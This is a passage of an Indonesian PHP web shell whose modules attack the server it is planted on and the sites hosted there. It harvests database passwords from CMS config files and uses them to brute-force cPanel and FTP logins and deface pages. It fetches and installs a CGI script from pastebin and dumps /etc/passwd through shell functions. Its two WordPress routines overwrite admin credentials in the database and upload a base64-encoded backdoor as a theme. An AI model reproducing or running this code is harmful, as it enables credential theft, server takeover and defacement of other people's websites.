  3180.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3181.         </form>";
  3182.     }
  3183.     echo "</center>";
  3184. }elseif($_GET['do'] == 'cpftp_auto') {
  3185.     if($_POST['crack']) {
  3186.         $usercp = explode("\r\n", $_POST['user_cp']);
  3187.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3188.         $i = 0;
  3189.         foreach($usercp as $ucp) {
  3190.             foreach($passcp as $pcp) {
  3191.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3192.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3193.                     } else {
  3194.                         $_SESSION[$ucp] = "1";
  3195.                         $_SESSION[$pcp] = "1";
  3196.                         if($ucp == '' || $pcp == '') {
  3197.                             //
  3198.                         } else {
  3199.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3200.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3201.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3202.                             if((!$ftp_login) || (!$ftp_conn)) {
  3203.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  3204.                             } else {
  3205.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  3206.                                 $fi = htmlspecialchars($_POST['file_deface']);
  3207.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3208.                                 if($deface) {
  3209.                                     $i++;
  3210.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  3211.                                     if(function_exists('posix_getpwuid')) {
  3212.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  3213.                                         if($domain_cp == '') {
  3214.                                             echo "[+] <font color=red>Gabisa ambil nama domain nya</font><br><br>";
  3215.                                         } else {
  3216.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3217.                                             foreach($domains_cp[1] as $dj) {
  3218.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3219.                                                 $user_cp_url = $user_cp_url['name'];
  3220.                                                 if($user_cp_url == $ucp) {
  3221.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3222.                                                     break;
  3223.                                                 }
  3224.                                             }
  3225.                                         }
  3226.                                     } else {
  3227.                                         echo "[+] <font color=red>Gabisa ambil nama domain nya</font><br><br>";
  3228.                                     }
  3229.                                 } else {
  3230.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3231.                                 }
  3232.                             }
  3233.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3234.                         }
  3235.                     }
  3236.                 }
  3237.             }
  3238.         }
  3239.         if($i == 0) {
  3240.         } else {
  3241.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>bct.</font>";
  3242.         }
  3243.     } else {
  3244.         echo "<br><center>
  3245.         <form method='post'>
  3246.         Filename: <br>
  3247.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3248.         Deface Page: <br>
  3249.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-lo-deface.com/filemu.php' style='width: 450px;'><br>
  3250.         USER: <br>
  3251.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3252.         $_usercp = fopen("/etc/passwd","r");
  3253.         while($getu = fgets($_usercp)) {
  3254.             if($getu == '' || !$_usercp) {
  3255.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3256.             } else {
  3257.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3258.                 foreach($u[1] as $user_cp) {
  3259.                         if(is_dir("/home/$user_cp/public_html")) {
  3260.                             echo "$user_cp\n";
  3261.                     }
  3262.                 }
  3263.             }
  3264.         }
  3265.         echo "</textarea><br>
  3266.         PASS: <br>
  3267.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3268.         function cp_pass($dir) {
  3269.             $pass = "";
  3270.             $dira = scandir($dir);
  3271.             foreach($dira as $dirb) {
  3272.                 if(!is_file("$dir/$dirb")) continue;
  3273.                 $ambil = file_get_contents("$dir/$dirb");
  3274.                 if(preg_match("/WordPress/", $ambil)) {
  3275.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3276.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3277.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3278.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3279.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3280.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3281.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3282.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3283.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3284.                 } elseif(preg_match("/client/", $ambil)) {
  3285.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3286.                     if(preg_match('/"/', $pass1[1])) {
  3287.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3288.                         $pass .= $pass1[1]."\n";
  3289.                     }
  3290.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3291.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3292.                 }
  3293.             }
  3294.             echo $pass;
  3295.         }
  3296.         $cp_pass = cp_pass($dir);
  3297.         echo $cp_pass;
  3298.         echo "</textarea><br>
  3299.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3300.         </form>
  3301.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3302.     }
  3303. }
  3304. elseif($_GET['do'] == 'cgi') {
  3305.     $cgi_dir = mkdir('cegei', 0755);
  3306.     $file_cgi = "cegei/cgi.izo";
  3307.     $isi_htcgi = "AddHandler cgi-script .izo";
  3308.     $htcgi = fopen(".htaccess", "w");
  3309.     $cgi_script = file_get_contents("http://pastebin.com/raw/sTDdJDhk");
  3310.     $cgi = fopen($file_cgi, "w");
  3311.     fwrite($cgi, $cgi_script);
  3312.     fwrite($htcgi, $isi_htcgi);
  3313.     chmod($file_cgi, 0755);
  3314.     echo "<iframe src='cegei/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3315. }
  3316. elseif($_GET['do'] == 'fake_root') {
  3317.     ob_start();
  3318.     function reverse($url) {
  3319.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3320.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3321.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  3322.               curl_setopt($ch, CURLOPT_HEADER, 0);
  3323.               curl_setopt($ch, CURLOPT_POST, 1);
  3324.         $resp = curl_exec($ch);
  3325.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3326.         $array = explode(",,", $resp);
  3327.         unset($array[0]);
  3328.         foreach($array as $lnk) {
  3329.             $lnk = "http://$lnk";
  3330.             $lnk = str_replace(",", "", $lnk);
  3331.             echo $lnk."\n";
  3332.             ob_flush();
  3333.             flush();
  3334.         }
  3335.               curl_close($ch);
  3336.     }
  3337.     function cek($url) {
  3338.         $ch = curl_init($url);
  3339.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3340.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3341.         $resp = curl_exec($ch);
  3342.         return $resp;
  3343.     }
  3344.     $cwd = getcwd();
  3345.     $ambil_user = explode("/", $cwd);
  3346.     $user = $ambil_user[2];
  3347.     if($_POST['reverse']) {
  3348.         $site = explode("\r\n", $_POST['url']);
  3349.         $file = $_POST['file'];
  3350.         foreach($site as $url) {
  3351.             $cek = cek("$url/~$user/$file");
  3352.             if(preg_match("/hacked/i", $cek)) {
  3353.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3354.             }
  3355.         }
  3356.     } else {
  3357.         echo "<br><center><form method='post'>
  3358.         Filename: <br><input type='text' name='file' value='bct.html' size='50' height='10'><br>
  3359.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3360.         Domain: <br>
  3361.         <textarea style='width: 450px; height: 250px;' name='url'>";
  3362.         reverse($_SERVER['HTTP_HOST']);
  3363.         echo "</textarea><br>
  3364.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3365.         </form><br>
  3366.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3367.     }
  3368. } elseif($_GET['do'] == 'adminer') {
  3369.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3370.     function adminer($url, $isi) {
  3371.         $fp = fopen($isi, "w");
  3372.         $ch = curl_init();
  3373.               curl_setopt($ch, CURLOPT_URL, $url);
  3374.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3375.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3376.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3377.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3378.         return curl_exec($ch);
  3379.               curl_close($ch);
  3380.         fclose($fp);
  3381.         ob_flush();
  3382.         flush();
  3383.     }
  3384.     if(file_exists('adminer.php')) {
  3385.         echo "<br><center><font color=lime><a href='$full/adminer.php' target='_blank'>-> Adminer Login Here <-</a></font></center><br>";
  3386.     } else {
  3387.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3388.             echo "<br><center><font color=lime><a href='$full/adminer.php' target='_blank'>-> Adminer Login Here <-</a></font></center><br>";
  3389.         } else {
  3390.             echo "<br><center><font color=red>gagal buat file adminer</font></center><br>";
  3391.         }
  3392.     }
  3393. }elseif($_GET['do'] == 'passwbypass') {
  3394.     echo '<br><center>Bypass /etc/passwd With :<br>
  3395. <table style="width:50%">
  3396.  <tr>
  3397.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3398.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3399.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  3400.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  3401.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="mix"></form></td>
  3402. </tr></table>Bypass User With : <table style="width:50%">
  3403. <tr>
  3404.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3405.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3406.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3407.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  3408.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3409. </tr>
  3410. </table><br>';
  3411.  
  3412.  
  3413. if ($_POST['awkuser']) {
  3414. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3415. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3416. echo "</textarea><br>";
  3417. }
  3418. if ($_POST['systuser']) {
  3419. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3420. echo system("ls /var/mail");
  3421. echo "</textarea><br>";
  3422. }
  3423. if ($_POST['passthuser']) {
  3424. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3425. echo passthru("ls /var/mail");
  3426. echo "</textarea><br>";
  3427. }
  3428. if ($_POST['exuser']) {
  3429. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3430. echo exec("ls /var/mail");
  3431. echo "</textarea><br>";
  3432. }
  3433. if ($_POST['shexuser']) {
  3434. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3435. echo shell_exec("ls /var/mail");
  3436. echo "</textarea><br>";
  3437. }
  3438. if($_POST['syst'])
  3439. {
  3440. echo"<textarea class='inputz' cols='65' rows='15'>";
  3441. echo system("cat /etc/passwd");
  3442. echo"</textarea><br><br><b></b><br>";
  3443. }
  3444. if($_POST['passth'])
  3445. {
  3446. echo"<textarea class='inputz' cols='65' rows='15'>";
  3447. echo passthru("cat /etc/passwd");
  3448. echo"</textarea><br><br><b></b><br>";
  3449. }
  3450. if($_POST['ex'])
  3451. {
  3452. echo"<textarea class='inputz' cols='65' rows='15'>";
  3453. echo exec("cat /etc/passwd");
  3454. echo"</textarea><br><br><b></b><br>";
  3455. }
  3456. if($_POST['shex'])
  3457. {
  3458. echo"<textarea class='inputz' cols='65' rows='15'>";
  3459. echo shell_exec("cat /etc/passwd");
  3460. echo"</textarea><br><br><b></b><br>";
  3461. }
  3462. echo '<center>';
  3463. if($_POST['mix'])
  3464. {
  3465. echo"<textarea class='inputz' cols='65' rows='15'>";
  3466. for($uid=0;$uid<60000;$uid++){
  3467. $ara = posix_getpwuid($uid);
  3468. if (!empty($ara)) {
  3469. while (list ($key, $val) = each($ara)){
  3470. print "$val:";
  3471. }
  3472. print "\n";
  3473. }
  3474. }
  3475. echo"</textarea><br><br>";
  3476. }
  3477. //
  3478.  
  3479. //
  3480. } elseif($_GET['do'] == 'auto_dwp') {
  3481.     if($_POST['auto_deface_wp']) {
  3482.         function anucurl($sites) {
  3483.             $ch = curl_init($sites);
  3484.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3485.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3486.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3487.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3488.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3489.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3490.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3491.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3492.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3493.             $data = curl_exec($ch);
  3494.                   curl_close($ch);
  3495.             return $data;
  3496.         }
  3497.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3498.             $post = array(
  3499.                    "log" => "$userr",
  3500.                    "pwd" => "$pass",
  3501.                    "rememberme" => "forever",
  3502.                    "wp-submit" => "$wp_submit",
  3503.                    "redirect_to" => "$web",
  3504.                    "testcookie" => "1",
  3505.                    );
  3506.             $ch = curl_init($cek);
  3507.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3508.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3509.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3510.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3511.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3512.                   curl_setopt($ch, CURLOPT_POST, 1);
  3513.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3514.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3515.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3516.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3517.             $data = curl_exec($ch);
  3518.                   curl_close($ch);
  3519.             return $data;
  3520.         }
  3521.         $scan = $_POST['link_config'];
  3522.         $link_config = scandir($scan);
  3523.         $script = htmlspecialchars($_POST['script']);
  3524.         $user = "blackhatcode";
  3525.         $pass = "blackhatcode";
  3526.         $passx = md5($pass);
  3527.         foreach($link_config as $dir_config) {
  3528.             if(!is_file("$scan/$dir_config")) continue;
  3529.             $config = file_get_contents("$scan/$dir_config");
  3530.             if(preg_match("/WordPress/", $config)) {
  3531.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3532.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3533.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3534.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3535.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3536.                 $prefix = $dbprefix."users";
  3537.                 $option = $dbprefix."options";
  3538.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3539.                 $db = mysql_select_db($dbname);
  3540.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3541.                 $result = mysql_fetch_array($q);
  3542.                 $id = $result[ID];
  3543.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3544.                 $result2 = mysql_fetch_array($q2);
  3545.                 $target = $result2[option_value];
  3546.                 if($target == '') {                
  3547.                     echo "[-] <font color=red>Error, gabisa ambil nama domain nya</font><br>";
  3548.                 } else {
  3549.                     echo "[+] $target <br>";
  3550.                 }
  3551.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3552.                 if(!$conn OR !$db OR !$update) {
  3553.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3554.                     mysql_close($conn);
  3555.                 } else {
  3556.                     $site = "$target/wp-login.php";
  3557.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3558.                     $b1 = anucurl($site2);
  3559.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3560.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3561.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3562.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3563.                     $www = "m.php";
  3564.                     $fp5 = fopen($www,"w");
  3565.                     fputs($fp5,$upload3);
  3566.                     $post2 = array(
  3567.                             "_wpnonce" => "$anu2",
  3568.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3569.                             "themezip" => "@$www",
  3570.                             "install-theme-submit" => "Install Now",
  3571.                             );
  3572.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3573.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3574.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3575.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3576.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3577.                           curl_setopt($ch, CURLOPT_POST, 1);
  3578.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3579.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3580.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3581.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3582.                     $data3 = curl_exec($ch);
  3583.                           curl_close($ch);
  3584.                     $y = date("Y");
  3585.                     $m = date("m");
  3586.                     $namafile = "id.php";
  3587.                     $fpi = fopen($namafile,"w");
  3588.                     fputs($fpi,$script);
  3589.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3590.                            curl_setopt($ch6, CURLOPT_POST, true);
  3591.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3592.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3593.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3594.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3595.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3596.                     $postResult = curl_exec($ch6);
  3597.                            curl_close($ch6);
  3598.                     $as = "$target/k.php";
  3599.                     $bs = anucurl($as);
  3600.                     if(preg_match("#$script#is", $bs)) {
  3601.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3602.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3603.                         } else {
  3604.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  3605.                         echo "[!!] coba aja manual: <br>";
  3606.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3607.                         echo "[+] username: <font color=lime>$user</font><br>";
  3608.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3609.                         }
  3610.                     mysql_close($conn);
  3611.                 }
  3612.             }
  3613.         }
  3614.     } else {
  3615.         echo "<center><h1>WordPress Auto Deface</h1>
  3616.         <form method='post'>
  3617.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3618.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By BlackhatCode' required><br>
  3619.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Start Now!'>
  3620.         </form>
  3621.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3622.         </center>";
  3623.     }
  3624. } elseif($_GET['do'] == 'auto_dwp2') {
  3625.     if($_POST['auto_deface_wp']) {
  3626.         function anucurl($sites) {
  3627.             $ch = curl_init($sites);
  3628.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3629.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3630.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3631.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3632.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3633.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3634.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3635.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3636.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3637.             $data = curl_exec($ch);
  3638.                   curl_close($ch);
  3639.             return $data;
  3640.         }
  3641.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3642.             $post = array(
  3643.                    "log" => "$userr",
  3644.                    "pwd" => "$pass",
  3645.                    "rememberme" => "forever",
  3646.                    "wp-submit" => "$wp_submit",
  3647.                    "redirect_to" => "$web",
  3648.                    "testcookie" => "1",
  3649.                    );
  3650.             $ch = curl_init($cek);
  3651.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3652.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3653.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3654.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3655.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3656.                   curl_setopt($ch, CURLOPT_POST, 1);
  3657.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3658.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3659.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3660.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3661.             $data = curl_exec($ch);
  3662.                   curl_close($ch);
  3663.             return $data;
  3664.         }
  3665.         $link = explode("\r\n", $_POST['link']);
  3666.         $script = htmlspecialchars($_POST['script']);
  3667.         $user = "indoxploit";
  3668.         $pass = "indoxploit";
  3669.         $passx = md5($pass);
  3670.         foreach($link as $dir_config) {
  3671.             $config = anucurl($dir_config);
  3672.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3673.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3674.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3675.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3676.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3677.             $prefix = $dbprefix."users";
  3678.             $option = $dbprefix."options";
  3679.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3680.             $db = mysql_select_db($dbname);
  3681.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3682.             $result = mysql_fetch_array($q);
  3683.             $id = $result[ID];
  3684.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3685.             $result2 = mysql_fetch_array($q2);
  3686.             $target = $result2[option_value];
  3687.             if($target == '') {                
  3688.                 echo "[-] <font color=red>Error, gabisa ambil nama domain nya</font><br>";
  3689.             } else {
  3690.                 echo "[+] $target <br>";
  3691.             }
  3692.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3693.             if(!$conn OR !$db OR !$update) {
  3694.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3695.                 mysql_close($conn);
  3696.             } else {
  3697.                 $site = "$target/wp-login.php";
  3698.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  3699.                 $b1 = anucurl($site2);
  3700.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3701.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3702.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3703.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3704.                 $www = "m.php";
  3705.                 $fp5 = fopen($www,"w");
  3706.                 fputs($fp5,$upload3);
  3707.                 $post2 = array(
  3708.                         "_wpnonce" => "$anu2",
  3709.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3710.                         "themezip" => "@$www",
  3711.                         "install-theme-submit" => "Install Now",
  3712.                         );
  3713.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3714.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3715.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3716.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3717.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3718.                       curl_setopt($ch, CURLOPT_POST, 1);
  3719.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3720.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3721.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3722.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3723.                 $data3 = curl_exec($ch);
  3724.                       curl_close($ch);
  3725.                 $y = date("Y");
  3726.                 $m = date("m");
  3727.                 $namafile = "id.php";
  3728.                 $fpi = fopen($namafile,"w");
  3729.                 fputs($fpi,$script);
  3730.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3731.                        curl_setopt($ch6, CURLOPT_POST, true);
  3732.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3733.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3734.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3735.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3736.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  3737.                 $postResult = curl_exec($ch6);
  3738.                        curl_close($ch6);
  3739.                 $as = "$target/k.php";
  3740.                 $bs = anucurl($as);
  3741.                 if(preg_match("#$script#is", $bs)) {
  3742.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3743.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3744.                     } else {
  3745.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  3746.                     echo "[!!] coba aja manual: <br>";
  3747.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3748.                     echo "[+] username: <font color=lime>$user</font><br>";
  3749.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3750.                     }
  3751.                 mysql_close($conn);
  3752.             }
  3753.         }
  3754.     } else {
  3755.         echo "<center><h1>WordPress Auto Deface V2</h1>
  3756.         <form method='post'>
  3757.         Link Config: <br>
